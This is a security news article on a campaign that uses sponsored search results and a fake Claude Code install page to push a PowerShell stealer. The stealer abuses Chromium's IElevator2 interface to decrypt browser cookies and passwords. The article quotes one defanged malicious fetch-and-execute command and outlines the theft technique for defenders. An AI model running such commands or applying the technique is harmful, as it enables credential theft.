Skip to main content
Emerging ThreatsMalware & Ransomware

Malware Exploits Chromium Interface to Steal Dev Secrets

Developer workstation with laptop, code editor, and cluttered desk in a bright office.

"We publish for peer correlation rather than attribution." — Ontinue security researchers.

How a search ad became a conduit for developer secrets

Ontinue’s threat hunters say the campaign relies on developers searching for the one-line installer "install claude code" and selecting a sponsored result that leads to a lookalike Claude Code installation page. The page appears to download and execute Anthropic’s authentic installer, but the researchers found the malicious instruction is not embedded in the file: it is rendered into the HTML of the landing page so victims copy a different command than automated scanners see.

Ontinue described the benign-looking command the lure mimics ("irm https[:]//claude[.]ai/install.ps1 | iex") and the malicious replacement the victims are given ("irm events[.]msft23[.]com | iex"). Because the Cloudflare-fronted domain bears a valid Let’s Encrypt certificate, “automated scanners, URL reputation services, and any skeptical reviewer who simply curls the URL therefore observe clean PowerShell,” the researchers wrote — while victims are served an entirely different command in the browser.

Three domains, Cloudflare fronting, and a high-speed registration pattern

Ontinue traced the operation to three domains, all registered within six days of each other in April, and all fronted through Cloudflare. That rapid registration and common fronting are part of the lure: landing pages deliver an authentic installer to avoid suspicion while the rendered HTML directs victims to an obfuscated PowerShell loader.

IElevator2, App-Bound Encryption, and the native helper

The campaign abuses Chromium’s IElevator2 COM interface — the elevation service Google introduced in January to handle App-Bound Encryption (ABE) for sensitive browser data. Ontinue says the attack injects a small native AEB helper into a live browser process whose “exclusive purpose” is to call IElevator2 and recover the ABE key used to encrypt cookies and saved passwords.

The helper formats a pipe using Chromium’s legitimate Mojo naming convention for inter-process communication and attempts to use IElevator2 to decrypt developer secrets. If IElevator2 is unavailable, the helper falls back to the legacy elevation service alongside the legacy IElevator. Ontinue published a full list of elevation-service identifiers to aid detection and response.

PowerShell loader, decrypted cookies, and in-memory exfiltration

Once the helper returns the ABE key, the obfuscated PowerShell loader decrypts local browser databases and exfiltrates the contents. Ontinue reports the malware steals decrypted cookies, passwords, and payment methods from Chromium-based browsers including Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. Stolen data is packaged as an in-memory secure_prefs.zip archive and sent to an attacker-controlled server.

The researchers emphasize the campaign’s orchestration model places most detection-visible activity inside PowerShell while the native PE is a tiny, single-purpose helper. That split matters for defenders because, in Ontinue’s words, “behavioral rule sets that look at the native PE in isolation will see nothing actionable.” Their recommendation: “Detection has to land at the COM call and at the PowerShell layer.”

How developers, technologists, and procurement leaders should view the risk

  • Developers and end users: searching for “install claude code” and clicking sponsored results can lead to a landing page that renders a malicious command into the HTML even while the downloaded installer appears legitimate.
  • Technologists and security teams: the operation uses a tiny native helper that acts as a single-purpose ABE oracle, moving most malicious behavior into PowerShell. Ontinue advises detection to focus on COM calls to IElevator2 (and legacy elevation identifiers) and on suspicious PowerShell activity rather than on the native PE alone.
  • Procurement and platform owners: the campaign leverages Cloudflare fronting and valid Let’s Encrypt certificates so URL reputation checks and automated scanners may be misled. The rapid creation of multiple domains in a short window is part of the attacker tradecraft.

Ontinue compared the malware to several documented commodity stealers and found no technical match with published families. The closest similarity is Glove Stealer — first documented by Gen Digital in November 2024 — which also used a helper module and named-pipe communication, but Ontinue notes the orchestration here is distinct. The researchers published elevation-service identifiers and a technical write-up to help defenders correlate findings.

The campaign is a reminder that defenses designed to protect browser secrets can be reworked by adversaries who split functionality between tiny native helpers and higher-level scripting. Ontinue’s documentation of the HTML-based lure, the IElevator2 abuse, and the PowerShell exfiltration chain aims to give defenders the specific indicators and detection points they need to counter the technique.

Original reporting